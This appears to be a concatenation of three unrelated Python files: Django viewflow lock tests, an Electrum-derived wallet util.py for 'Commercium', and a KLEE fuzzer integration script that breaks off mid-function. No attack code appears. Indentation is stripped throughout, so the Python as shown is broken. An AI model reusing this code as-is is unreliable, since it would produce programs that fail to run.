@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_lock_ignores_user_exceptions(self):
"""
Check fix for RuntimeError: generator didn't stop after throw().
https://github.com/viewflow/viewflow/pull/164
"""
def test_func():
lock_impl = lock.SelectForUpdateLock(attempts=4)
with lock_impl(Test.TestFlow)(Test.TestFlow, self.process.pk):
raise DatabaseError('Test')
with self.assertRaises(DatabaseError):
test_func()
@unittest.skipIf(django.VERSION >= (1, 11), 'disabled due no migration run in dj 1.11+')
def test_cache_lock(self):
lock_impl = lock.CacheLock(attempts=1)
thread1 = threading.Thread(target=self.run_with_lock, args=[lock_impl])
thread2 = threading.Thread(target=self.run_with_lock, args=[lock_impl])
thread1.start()
thread2.start()
try:
self.exception_queue.get(True, 10)
except queue.Empty:
self.fail('No thread was blocked')
finally:
self.finished = True
thread1.join()
thread2.join()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'CMM':8, 'mCMM':5, 'uCMM':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Raise this exception to unwind the stack, as when an error occurs;
# however, unlike other exceptions, the user will not be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
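# Usage sketch (added):
#   @profiler
#   def load_transactions(...):
#       ...
# prints something like "[profiler] load_transactions 0.1234" to stderr when verbose.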
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electron.electron'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast a string to a bytes-like object; bytearray input is copied to bytes (kept for python2 support)
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020a'
:param x: bytes
:rtype: str
"""
#v = hfu(x)
#v1 = v.decode('ascii')
#return v1
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".commerciumelectro")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "CommerciumElectro")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "CommerciumElectro")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'explorer.commercium.net': ('https://explorer.commercium.net/',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'explorer.commercium.net': ('https://explorer.commercium.net/',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'explorer.commercium.net')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'cmm':
raise BaseException("Not Commercium URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
    if 'message' in out:
        out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='cmm', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
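# Round-trip sketch (ADDR stands for any address accepted by bitcoin.is_address; the
# amount formatting relies on format_satoshis_plain defined earlier in this module):
#   create_URI(ADDR, 150000000, 'thanks')  -> 'cmm:ADDR?amount=1.5&message=thanks'
#   parse_URI('cmm:ADDR?amount=1.5')       -> {'address': ADDR, 'amount': 150000000}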
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
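# Minimal example: the first newline-terminated JSON object is decoded, the rest is kept
# as the unconsumed buffer:
#   >>> parse_json(b'{"id": 1}\n{"id": 2}')
#   ({'id': 1}, b'{"id": 2}')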
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
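# Usage sketch (the request/response shapes below are illustrative, not a fixed protocol):
#   pipe = SocketPipe(connected_socket)
#   pipe.send({'id': 0, 'method': 'server.version', 'params': []})
#   try:
#       response = pipe.get()   # raises `timeout` if nothing arrives in time
#   except timeout:
#       pass                    # caller decides whether to retry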
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
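# Loopback sketch: sharing one queue for both directions makes a sent request readable
# again, which is handy in unit tests:
#   >>> import queue
#   >>> q = queue.Queue()
#   >>> pipe = QueuePipe(send_queue=q, get_queue=q)
#   >>> pipe.send({'id': 7})
#   >>> pipe.get()
#   {'id': 7}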
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
fuzzer.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration code for AFL fuzzer."""
# pylint: disable=too-many-arguments
import shutil
import os
import glob
import pathlib
import struct
import subprocess
import threading
import time
from datetime import datetime
from fuzzers import utils
LIB_BC_DIR = 'lib-bc'
SYMBOLIC_BUFFER = 'kleeInputBuf'
MODEL_VERSION = 'model_version'
MAX_SOLVER_TIME_SECONDS = 30
MAX_TOTAL_TIME_DEFAULT = 82800 # Default experiment duration = 23 hrs.
def is_benchmark(name):
"""Check if the benchmark contains the string |name|"""
benchmark = os.getenv('BENCHMARK', None)
return benchmark is not None and name in benchmark
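# For example (hypothetical benchmark name): with BENCHMARK=sqlite3_ossfuzz in the
# environment, is_benchmark('sqlite3') is True and is_benchmark('curl') is False.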
def prepare_build_environment():
"""Set environment variables used to build benchmark."""
if is_benchmark('sqlite3'):
sqlite3_flags = [
'-DSQLITE_THREADSAFE=0', '-DSQLITE_OMIT_LOAD_EXTENSION',
'-DSQLITE_DEFAULT_MEMSTATUS=0', '-DSQLITE_MAX_EXPR_DEPTH=0',
'-DSQLITE_OMIT_DECLTYPE', '-DSQLITE_OMIT_DEPRECATED',
'-DSQLITE_DEFAULT_PAGE_SIZE=512', '-DSQLITE_DEFAULT_CACHE_SIZE=10',
'-DSQLITE_DISABLE_INTRINSIC', '-DSQLITE_DISABLE_LFS',
'-DYYSTACKDEPTH=20', '-DSQLITE_OMIT_LOOKASIDE', '-DSQLITE_OMIT_WAL',
'-DSQLITE_DEFAULT_LOOKASIDE=\'64,5\'',
'-DSQLITE_OMIT_PROGRESS_CALLBACK', '-DSQLITE_OMIT_SHARED_CACHE'
]
utils.append_flags('CFLAGS', sqlite3_flags)
utils.append_flags('CXXFLAGS', sqlite3_flags)
        # This convinces the sqlite3 ./configure script not to re-enable threads
os.environ['enable_threadsafe'] = 'no'
# See https://klee.github.io/tutorials/testing-function/
cflags = ['-O0', '-Xclang', '-disable-O0-optnone']
utils.append_flags('CFLAGS', cflags)
utils.append_flags('CXXFLAGS', cflags)
# Add flags for various benchmarks.
add_compilation_cflags()
os.environ['LLVM_CC_NAME'] = 'clang-6.0'
os.environ['LLVM_CXX_NAME'] = 'clang++-6.0'
os.environ['LLVM_AR_NAME'] = 'llvm-ar-6.0'
os.environ['LLVM_LINK_NAME'] = 'llvm-link-6.0'
os.environ['LLVM_COMPILER'] = 'clang'
os.environ['CC'] = 'wllvm'
os.environ['CXX'] = 'wllvm++'
os.environ['FUZZER_LIB'] = '/libAFL.a' # -L/ -lKleeMock -lpthread'
# Fix FUZZER_LIB for various benchmarks.
fix_fuzzer_lib()
def openthread_suppress_error_flags():
"""Suppress errors for openthread"""
return [
'-Wno-error=embedded-directive',
'-Wno-error=gnu-zero-variadic-macro-arguments',
'-Wno-error=overlength-strings', '-Wno-error=c++11-long-long',
'-Wno-error=c++11-extensions', '-Wno-error=variadic-macros'
]
def get_size_for_benchmark():
"""
Returns the size for the seed for each benchmark.
"""
size = 256
if 're2-2014-12-09' in os.environ['BENCHMARK']:
size = 64
if 'libpng' in os.environ['BENCHMARK']:
size = 128
return size
def get_bcs_for_shared_libs(fuzz_target):
"""Get shared libs paths for the fuzz_target"""
ldd_cmd = ['/usr/bin/ldd', '{target}'.format(target=fuzz_target)]
output = ''
try:
output = subprocess.check_output(ldd_cmd, universal_newlines=True)
except subprocess.CalledProcessError:
raise ValueError('ldd failed')
for line in output.split('\n'):
if '=>' not in line:
continue
out_dir = '{out}/{lib_bc_dir}'.format(out=os.environ['OUT'],
lib_bc_dir=LIB_BC_DIR)
path = pathlib.Path(out_dir)
path.mkdir(exist_ok=True)
so_path = line.split('=>')[1].split(' ')[1]
so_name = so_path.split('/')[-1].split('.')[0]
if so_name:
getbc_cmd = 'extract-bc -o {out_dir}/{so_name}.bc {target}'.format(
target=so_path, out_dir=out_dir, so_name=so_name)
print('[extract-bc command] | {getbc_cmd}'.format(
getbc_cmd=getbc_cmd))
# This will fail for most of the dependencies, which is fine. We
# want to grab the .bc files for dependencies built in any given
# benchmark's build.sh file.
            success = os.system(getbc_cmd)
            # os.system returns the shell exit status; 0 means extract-bc succeeded.
            if success == 0:
                print('Got a bc file for {target}'.format(target=so_path))
def get_bc_files():
"""Returns list of .bc files in the OUT directory"""
out_dir = './' + LIB_BC_DIR
files = os.listdir(out_dir)
bc_files = []
for filename in files:
if filename.split('.')[-1] == 'bc' and 'fuzz-target' not in filename:
bc_files.append(filename)
return bc_files
def fix_fuzzer_lib():
"""Fix FUZZER_LIB for certain benchmarks"""
os.environ['FUZZER_LIB'] += ' -L/ -lKleeMock -lpthread'
if is_benchmark('curl'):
shutil.copy('/libKleeMock.so', '/usr/lib/libKleeMock.so')
shutil.copy('/libAFL.a', '/usr/lib/libFuzzingEngine.a')
if is_benchmark('systemd'):
shutil.copy('/libAFL.a', '/usr/lib/libFuzzingEngine.a')
ld_flags = ['-lpthread']
utils.append_flags('LDFLAGS', ld_flags)
def add_compilation_cflags():
"""Add custom flags for certain benchmarks"""
if is_benchmark('openthread'):
openthread_flags = openthread_suppress_error_flags()
utils.append_flags('CFLAGS', openthread_flags)
utils.append_flags('CXXFLAGS', openthread_flags)
elif is_benchmark('php'):
php_flags = ['-D__builtin_cpu_supports\\(x\\)=0']
utils.append_flags('CFLAGS', php_flags)
utils.append_flags('CXXFLAGS', php_flags)
# For some benchmarks, we also tell the compiler
# to ignore unresolved symbols. This is useful when we cannot change
# the build process to add a shared library for linking
# (which contains mocked functions: libAflccMock.so).
# Note that some functions are only defined post-compilation
# during the LLVM passes.
elif is_benchmark('bloaty') or is_benchmark('openssl') or is_benchmark(
'systemd'):
unresolved_flags = ['-Wl,--warn-unresolved-symbols']
utils.append_flags('CFLAGS', unresolved_flags)
utils.append_flags('CXXFLAGS', unresolved_flags)
elif is_benchmark('curl'):
dl_flags = ['-ldl', '-lpsl']
utils.append_flags('CFLAGS', dl_flags)
utils.append_flags('CXXFLAGS', dl_flags)
def build():
"""Build benchmark."""
prepare_build_environment()
utils.build_benchmark()
fuzz_target = os.getenv('FUZZ_TARGET')
fuzz_target_path = os.path.join(os.environ['OUT'], fuzz_target)
getbc_cmd = f'extract-bc {fuzz_target_path}'
if os.system(getbc_cmd) != 0:
raise ValueError('extract-bc failed')
get_bcs_for_shared_libs(fuzz_target_path)
def rmdir(path):
""""Remove a directory recursively"""
if os.path.isdir(path):
shutil.rmtree(path)
def emptydir(path):
"""Empty a directory"""
rmdir(path)
os.mkdir(path)
# pylint: disable=too-many-locals
def run(command, hide_output=False, ulimit_cmd=None):
"""Run the command |command|, optionally, run |ulimit_cmd| first."""
cmd = ' '.join(command)
print('[run_cmd] {}'.format(cmd))
output_stream = subprocess.DEVNULL if hide_output else None
if ulimit_cmd:
ulimit_command = [ulimit_cmd + ';']
ulimit_command.extend(command)
print('[ulimit_command] {}'.format(' '.join(ulimit_command)))
ret = subprocess.call(' '.join(ulimit_command),
stdout=output_stream,
stderr=output_stream,
shell=True)
else:
ret = subprocess.call(command,
stdout=output_stream,
stderr=output_stream)
if ret != 0:
raise ValueError('command failed: {ret} - {cmd}'.format(ret=ret,
cmd=cmd))
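# Sketch of the two call forms (the command is chosen purely for illustration):
#   run(['echo', 'hello'], hide_output=True)
#   run(['echo', 'hello'], ulimit_cmd='ulimit -s unlimited')
# The second form joins the pieces into "ulimit -s unlimited; echo hello" and runs it
# through the shell, so the limit applies to the spawned command.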
def convert_seed_inputs(ktest_tool, input_klee, input_corpus):
"""
Convert seeds to a format KLEE understands.
Returns the number of converted seeds.
"""
print('[run_fuzzer] Converting seed files...')
    # The file data goes into the symbolic buffer; model_version is set to 1 (as expected by uclibc).
model = struct.pack('@i', 1)
files = glob.glob(os.path.join(input_corpus, '*'))
n_converted = 0
for seedfile in files:
if '.ktest' in seedfile:
continue
if not os.path.isfile(seedfile):
continue
# Truncate the seed to the max size for the benchmark
file_size = os.path.getsize(seedfile)
benchmark_size = get_size_for_benchmark()
if file_size > benchmark_size:
print('[run_fuzzer] Truncating {path} ({file_size}) to \
{benchmark_size}'.format(path=seedfile,
file_size=file_size,
benchmark_size=benchmark_size))
os.truncate(seedfile, benchmark_size)
seed_in = '{seed}.ktest'.format(seed=seedfile)
seed_out = os.path.join(input_klee, os.path.basename(seed_in))
        # Create the file for the symbolic buffer
input_file = '{seed}.ktest.{symbolic}'.format(seed=seedfile,
symbolic=SYMBOLIC_BUFFER)
output_kfile = '{seed}.ktest'.format(seed=seedfile)
shutil.copyfile(seedfile, input_file)
os.rename(seedfile, input_file)
        # Create the file for the model version
model_input_file = '{seed}.ktest.{symbolic}'.format(
seed=seedfile, symbolic=MODEL_VERSION)
with open(model_input_file, 'wb') as mfile:
mfile.write(model)
# Run conversion tool
convert_cmd = [
ktest_tool, 'create', output_kfile, '--args', seed_out, '--objects',
MODEL_VERSION, SYMBOLIC_BUFFER
]
run(convert_cmd)
# Move the resulting file to klee corpus dir
os.rename(seed_in, seed_out)
n_converted += 1
print('[run_fuzzer] Converted {converted} seed files'.format(
converted=n_converted))
return n_converted
# pylint: disable=wrong-import-position
# pylint: disable=too-many-locals
def convert_individual_ktest(ktest_tool, kfile, queue_dir, output_klee,
crash_dir, info_dir):
"""
Convert an individual ktest, return the number of crashes.
"""
convert_cmd = [ktest_tool, 'extract', kfile, '--objects', SYMBOLIC_BUFFER]
run(convert_cmd)
# And copy the resulting file in output_corpus
ktest_fn = os.path.splitext(kfile)[0]
file_in = '{file}.{symbuf}'.format(file=kfile, symbuf=SYMBOLIC_BUFFER)
file_out = os.path.join(queue_dir, os.path.basename(ktest_fn))
os.rename(file_in, file_out)
# Check if this is a crash
crash_regex = os.path.join(output_klee, '{fn}.*.err'.format(fn=ktest_fn))
crashes = glob.glob(crash_regex)
n_crashes = 0
    if len(crashes) == 1:
        crash_out = os.path.join(crash_dir, os.path.basename(ktest_fn))
        shutil.copy(file_out, crash_out)
        info_in = crashes[0]
        info_out = os.path.join(info_dir, os.path.basename(info_in))
        shutil.copy(info_in, info_out)
        n_crashes = 1
    return n_crashes
def convert_outputs(ktest_tool, output_klee, crash_dir, queue_dir, info_dir):
"""Convert output files from KLEE format to binary format."""
print('[convert_thread] Waiting for ktests...')
n_ktest = 1
n_converted = 0
n_crashes = 0
while True:
ktest_file = os.path.join(output_klee,
'test{0:0{1}d}'.format(n_ktest, 6) + '.ktest')
print('[convert_thread] Waiting for file {filename}'.format(
filename=ktest_file))
while not os.path.isfile(ktest_file):
time.sleep(60)
# We have new files to convert.
print('[convert_thread] Starting new conversion with {filename}'.format(
filename=ktest_file))
while os.path.isfile(ktest_file):
n_crashes += convert_individual_ktest(ktest_tool, ktest_file,
queue_dir, output_klee,
crash_dir, info_dir)
n_ktest += 1
n_converted += 1
ktest_file = os.path.join(
output_klee, 'test{0:0{1}d}'.format(n_ktest, 6) + '.ktest')
print('[convert_thread] Converted {converted} output files. \
Found {crashes} crashes'.format(converted=n_converted,
crashes=n_crashes))
# pylint: disable=import-error
# pylint: disable=import-outside-toplevel
def monitor_resource_usage():
"""Monitor resource consumption."""
import psutil
print('[resource_thread] Starting resource usage monitoring...')
start = datetime.now()
while True:
time.sleep(60 * 5)
message = '{cputimes}\n{virtmem}\n{swap}'.format(
cputimes=psutil.cpu_times_percent(percpu=False),
virtmem=psutil.virtual_memory(),
swap=psutil.swap_memory())
now = datetime.now()
print(
'[resource_thread] Resource usage after {time}:\n{message}'.format(
time=now - start, message=message))
# pylint: disable=import-error
# pylint: disable=import-outside-toplevel
def fuzz(input_corpus, output_corpus, target_binary):
"""Run fuzzer."""
import psutil
    # Set ulimit. Note: os.system runs this in a child shell, so it does not affect this
    # process; the real limit is applied via ulimit_cmd when KLEE is launched below.
if os.system('ulimit -s unlimited') != 0:
raise ValueError('ulimit failed')
# Convert corpus files to KLEE .ktest format
out_dir = os.path.dirname(target_binary)
